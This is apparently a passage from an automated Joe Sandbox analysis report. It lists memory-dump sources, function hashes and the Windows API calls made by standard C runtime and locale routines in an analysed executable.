                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: InfoLocale
                                            • String ID: ACP$OCP$dyF
                                            • API String ID: 2299586839-82979244
                                            • Opcode ID: d5a1faba9b7b575dd2ad4ffeb9c62e5c26cc44b8d2753a6fb233a96fc30f08b5
                                            • Instruction ID: 0834595388477efd4144f7ed098e3599e3533c0a6d7452780bc6ed7311b4c273
                                            • Opcode Fuzzy Hash: d5a1faba9b7b575dd2ad4ffeb9c62e5c26cc44b8d2753a6fb233a96fc30f08b5
                                            • Instruction Fuzzy Hash: A321D322B08501A6DB348F6CC900A9773A7EF54B7CB668426E90AD7311F73ADE41C35A
                                            APIs
                                              • Part of subcall function 0045EB00: GetLastError.KERNEL32(?,00000008,00463006), ref: 0045EB04
                                              • Part of subcall function 0045EB00: SetLastError.KERNEL32(00000000,00000000,00000002,000000FF), ref: 0045EBA6
                                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00467927
                                            • IsValidCodePage.KERNEL32(00000000), ref: 00467970
                                            • IsValidLocale.KERNEL32(?,00000001), ref: 0046797F
                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 004679C7
                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 004679E6
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                            • String ID:
                                            • API String ID: 415426439-0
                                            • Opcode ID: ba3a75ad30a7687fa48841fa36b81094aa4dadc8d147eacc5edf6f7a873f875c
                                            • Instruction ID: 681bccfff49aef6119f12b13a3a1defe21d17895bd22319df67769cf6f999274
                                            • Opcode Fuzzy Hash: ba3a75ad30a7687fa48841fa36b81094aa4dadc8d147eacc5edf6f7a873f875c
                                            • Instruction Fuzzy Hash: 8A5182B1A04205AFEB10EFA6CC45ABF73B8BF04708F14446BE905E7251F7789945CB6A
                                            APIs
                                              • Part of subcall function 0045EB00: GetLastError.KERNEL32(?,00000008,00463006), ref: 0045EB04
                                              • Part of subcall function 0045EB00: SetLastError.KERNEL32(00000000,00000000,00000002,000000FF), ref: 0045EBA6
                                            • GetACP.KERNEL32(?,?,?,?,?,?,0045CB0C,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00466F78
                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0045CB0C,?,?,?,00000055,?,-00000050,?,?), ref: 00466FA3
                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00467106
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$CodeInfoLocalePageValid
                                            • String ID: utf8
                                            • API String ID: 607553120-905460609
                                            • Opcode ID: 1b239071fbe5d41f230da2aa44a6e602cf193d3b0a213d37430bdaf6a4f1dd45
                                            • Instruction ID: aedb80167745650f656434380b4ba6edeccc205238694255b191633b05df6840
                                            • Opcode Fuzzy Hash: 1b239071fbe5d41f230da2aa44a6e602cf193d3b0a213d37430bdaf6a4f1dd45
                                            • Instruction Fuzzy Hash: BB71F971604202AADB28AB75DC46BA773A8EF44708F11442FFA05D7282F77CED41876B
                                            APIs
                                            • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00454E32
                                            • IsDebuggerPresent.KERNEL32 ref: 00454EFE
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00454F17
                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00454F21
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                            • String ID:
                                            • API String ID: 254469556-0
                                            • Opcode ID: fc4ec47090a7013cf66a775028d6e790e084ebe37fb3ad47fe50b3dad958f742
                                            • Instruction ID: 2633c34858779039dcbee10055d80fac8943377eb1bf4be7d228854da9f364e7
                                            • Opcode Fuzzy Hash: fc4ec47090a7013cf66a775028d6e790e084ebe37fb3ad47fe50b3dad958f742
                                            • Instruction Fuzzy Hash: A7312775D052189BDF20DFA5D949BCDBBB8BF08305F1041AAE80CAB251EB749A85CF49
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dbd9d945d9219ed60390f0a224a6f1f602a38186542e2a8b590fbb95aa56bcf0
                                            • Instruction ID: 3070f9557ae60098ef26df62b4536154273e7df02c8b7554a70fe08f64d2bc5e
                                            • Opcode Fuzzy Hash: dbd9d945d9219ed60390f0a224a6f1f602a38186542e2a8b590fbb95aa56bcf0
                                            • Instruction Fuzzy Hash: F141C9B5C0411DAFDF20DF69CC89AAABBB9EF85304F1442DEE418D3201EA359E858F54
                                            APIs
                                            • __EH_prolog3.LIBCMT ref: 00452093
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0045209D
                                            • int.LIBCPMT ref: 004520B4
                                              • Part of subcall function 004525EC: std::_Lockit::_Lockit.LIBCPMT ref: 004525FD
                                              • Part of subcall function 004525EC: std::_Lockit::~_Lockit.LIBCPMT ref: 00452617
                                            • codecvt.LIBCPMT ref: 004520D7
                                            • std::_Facet_Register.LIBCPMT ref: 004520EE
                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0045210E
                                            • Concurrency::cancel_current_task.LIBCPMT ref: 0045211B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                            • String ID: |,E
                                            • API String ID: 2133458128-2637010583
                                            • Opcode ID: 514960b8862c7fd782fa4d68f3da898137d7585b3a16624e3e9a391e261de632
                                            • Instruction ID: 027b942d64fd7e1ab56cf7a7f95d1955fee7058ca5ca0fdf5d21738433594c5c
                                            • Opcode Fuzzy Hash: 514960b8862c7fd782fa4d68f3da898137d7585b3a16624e3e9a391e261de632
                                            • Instruction Fuzzy Hash: 6C01C4319001199BCB05EB65CA156AE7B65AFC531AF14040FFC10AB283DFF89E09CB8D
                                            APIs
                                            • __EH_prolog3.LIBCMT ref: 00452128
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00452132
                                            • int.LIBCPMT ref: 00452149
                                              • Part of subcall function 004525EC: std::_Lockit::_Lockit.LIBCPMT ref: 004525FD
                                              • Part of subcall function 004525EC: std::_Lockit::~_Lockit.LIBCPMT ref: 00452617
                                            • ctype.LIBCPMT ref: 0045216C
                                            • std::_Facet_Register.LIBCPMT ref: 00452183
                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004521A3
                                            • Concurrency::cancel_current_task.LIBCPMT ref: 004521B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                            • String ID: |,E
                                            • API String ID: 2958136301-2637010583
                                            • Opcode ID: f083019252ccbad8f5b472ecae99323905c31ce168862b5c99f681330adda807
                                            • Instruction ID: a66554d359522e3d72130eac09761b4b358931ef6e3771ddc4118bec848e9b96
                                            • Opcode Fuzzy Hash: f083019252ccbad8f5b472ecae99323905c31ce168862b5c99f681330adda807
                                            • Instruction Fuzzy Hash: 1C01A131900115ABCB05EB65C9056AE7B65AF86316F14400FED10AB293DFB89E08CB8D
                                            APIs
                                            • type_info::operator==.LIBVCRUNTIME ref: 00457DA7
                                            • ___TypeMatch.LIBVCRUNTIME ref: 00457EB5
                                            • _UnwindNestedFrames.LIBCMT ref: 00458007
                                            • CallUnexpected.LIBVCRUNTIME ref: 00458022
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                            • String ID: csm$csm$csm
                                            • API String ID: 2751267872-393685449
                                            • Opcode ID: c2d572813652cd854aff3952b3cc68fe3fff3156524f143f6b29b0a695757390
                                            • Instruction ID: c3686607e76db5187e9934fcc29fd3e2624664afe83a19eac1950f82c7bf4952
                                            • Opcode Fuzzy Hash: c2d572813652cd854aff3952b3cc68fe3fff3156524f143f6b29b0a695757390
                                            • Instruction Fuzzy Hash: C5B17B72804209EFCF25DF95E8819AEBBB5BF04316B14406BEC116B243D738DA59CB99
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3907804496
                                            • Opcode ID: e2eff747b4e8e8ed7af74a35fd317d6caf5ccd26b1d4ff9a6bdfb1ac79ac6d75
                                            • Instruction ID: d599fa3d7c567824fdf32f09bd947b994c18a219e5489b27dcbd90f23cc5530a
                                            • Opcode Fuzzy Hash: e2eff747b4e8e8ed7af74a35fd317d6caf5ccd26b1d4ff9a6bdfb1ac79ac6d75
                                            • Instruction Fuzzy Hash: 3AB1F6B0E04245AFDB01DF99C850BBE7BB1BF45314F18415AF840973A2E7789D45CBAA
                                            APIs
                                            • _ValidateLocalCookies.LIBCMT ref: 00457757
                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0045775F
                                            • _ValidateLocalCookies.LIBCMT ref: 004577E8
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00457813
                                            • _ValidateLocalCookies.LIBCMT ref: 00457868
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                            • String ID: csm$|,E
                                            • API String ID: 1170836740-3766833512
                                            • Opcode ID: c81e835724068e10ab36865e3d650022a289c436149df97e38cd85efe13c54cd
                                            • Instruction ID: 21ffd6932fd4ba08d2412dc4f2c0a5b430441621df8d34f9ec616c063bc405db
                                            • Opcode Fuzzy Hash: c81e835724068e10ab36865e3d650022a289c436149df97e38cd85efe13c54cd
                                            • Instruction Fuzzy Hash: 8741E934A042149BCF10DF69D844A9E7BB5BF49315F1480ABEC146B393D739E909CB99
                                            APIs
                                            • GetCPInfo.KERNEL32(00AD0650,00AD0650,?,7FFFFFFF,?,00469C39,00AD0650,00AD0650,?,00AD0650,?,?,?,?,00AD0650,?), ref: 00469A0F
                                            • __alloca_probe_16.LIBCMT ref: 00469ACA
                                            • __alloca_probe_16.LIBCMT ref: 00469B59
                                            • __freea.LIBCMT ref: 00469BA4
                                            • __freea.LIBCMT ref: 00469BAA
                                            • __freea.LIBCMT ref: 00469BE0
                                            • __freea.LIBCMT ref: 00469BE6
                                            • __freea.LIBCMT ref: 00469BF6
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __freea$__alloca_probe_16$Info
                                            • String ID:
                                            • API String ID: 127012223-0
                                            • Opcode ID: 93e4867b3787de6dbeb0a8db3ee5ee16a8b6f4c25472653bb603e73c32041264
                                            • Instruction ID: 54ae9dc2500aedb972ddb36a91ef1ea756ff7c8781c7ae2e7337d3d85c0b1520
                                            • Opcode Fuzzy Hash: 93e4867b3787de6dbeb0a8db3ee5ee16a8b6f4c25472653bb603e73c32041264
                                            • Instruction Fuzzy Hash: E071D3729002456BDF209E949C82FAF77ADAF45714F28005BED04A7381FBBDDD05875A
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0045439F
                                            • __alloca_probe_16.LIBCMT ref: 004543CB
                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0045440A
                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00454427
                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00454466
                                            • __alloca_probe_16.LIBCMT ref: 00454483
                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004544C5
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 004544E8
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                            • String ID:
                                            • API String ID: 2040435927-0
                                            • Opcode ID: 0d272fd0afcda371521b12cb9e6211728478c95a7a38f502bcda67690e88fd6b
                                            • Instruction ID: d48d75857146ee2a6fad241fefe752b653d06eabe7aa406412dfe8d3770250a8
                                            • Opcode Fuzzy Hash: 0d272fd0afcda371521b12cb9e6211728478c95a7a38f502bcda67690e88fd6b
                                            • Instruction Fuzzy Hash: 3A51B572A00106BBDF208F61CC44FAF7BB9EB85759F15402AFD049A251E738DC59CB68
                                            APIs
                                            • __EH_prolog3.LIBCMT ref: 00453C92
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00453C9D
                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00453D0B
                                              • Part of subcall function 00453DEE: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00453E06
                                            • std::locale::_Setgloballocale.LIBCPMT ref: 00453CB8
                                            • _Yarn.LIBCPMT ref: 00453CCE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                            • String ID: |,E
                                            • API String ID: 1088826258-2637010583
                                            • Opcode ID: e88be3d185ceb4c6147cb0178e1d477ba001416d703d2bf169337cb5d5fa00d5
                                            • Instruction ID: 6bae16aa0a27cfde00f457d79a0ef5f384662ec8fa5aa9e6ebf5ac3343195208
                                            • Opcode Fuzzy Hash: e88be3d185ceb4c6147cb0178e1d477ba001416d703d2bf169337cb5d5fa00d5
                                            • Instruction Fuzzy Hash: 06019E75A002109BC706EF21D84157D7B71BF82386B18401EEC015B382DB786E4ACB8E
                                            APIs
                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,FC3EAC19,?,?,00000000,0046B1C6,000000FF,?,0045C17F,?,?,0045C153,00000016), ref: 0045C224
                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0045C236
                                            • FreeLibrary.KERNEL32(00000000,?,00000000,0046B1C6,000000FF,?,0045C17F,?,?,0045C153,00000016), ref: 0045C258
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll$|,E
                                            • API String ID: 4061214504-3781865653
                                            • Opcode ID: 01995e6bd5ebedb7a255e25a069745ae40b2279d128429824ff434e1364da218
                                            • Instruction ID: 899975a8d75a5dd322a2de0e1c9370cfa802d169ff474efcf1ff5f240f566dc7
                                            • Opcode Fuzzy Hash: 01995e6bd5ebedb7a255e25a069745ae40b2279d128429824ff434e1364da218
                                            • Instruction Fuzzy Hash: 8001A771E04619BFCB118F94DC45BAEB7B8FB44B15F000536F811A2290EBB89904CA99
                                            APIs
                                            • GetLastError.KERNEL32(?,?,00457911,00455ABF,00454FD2), ref: 00457928
                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00457936
                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0045794F
                                            • SetLastError.KERNEL32(00000000,00457911,00455ABF,00454FD2), ref: 004579A1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLastValue___vcrt_
                                            • String ID:
                                            • API String ID: 3852720340-0
                                            • Opcode ID: 2bf61edd34b150f94c35db35d7809654bb2dde44669da03c7c75fbd87ed70cfa
                                            • Instruction ID: e1b23571dc7b2a94b67e43e5429a9f173605aef98595c3beef293843330bdbb3
                                            • Opcode Fuzzy Hash: 2bf61edd34b150f94c35db35d7809654bb2dde44669da03c7c75fbd87ed70cfa
                                            • Instruction Fuzzy Hash: 5401F5B220D2111EB6202675BC45E2B2B49FB0137A720033FF914911F3FE5A5C0951BE
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AdjustPointer
                                            • String ID: |,E
                                            • API String ID: 1740715915-2637010583
                                            • Opcode ID: 27a11781794668767832ed9719780d785e8919e20b1115bd1d607ea30ac6f92b
                                            • Instruction ID: d5722d6cbf50990e6a8167c734c78f47093a20b6a7d8d8e6216c3de5f9069aef
                                            • Opcode Fuzzy Hash: 27a11781794668767832ed9719780d785e8919e20b1115bd1d607ea30ac6f92b
                                            • Instruction Fuzzy Hash: 7B51CE71A086029FDB248F11E885BBA77A5EB4031AF14453FED055B293E739AD48CB88
                                            APIs
                                            • __EH_prolog3.LIBCMT ref: 00452331
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0045233E
                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0045237B
                                              • Part of subcall function 00453D89: _Yarn.LIBCPMT ref: 00453DA8
                                              • Part of subcall function 00453D89: _Yarn.LIBCPMT ref: 00453DCC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
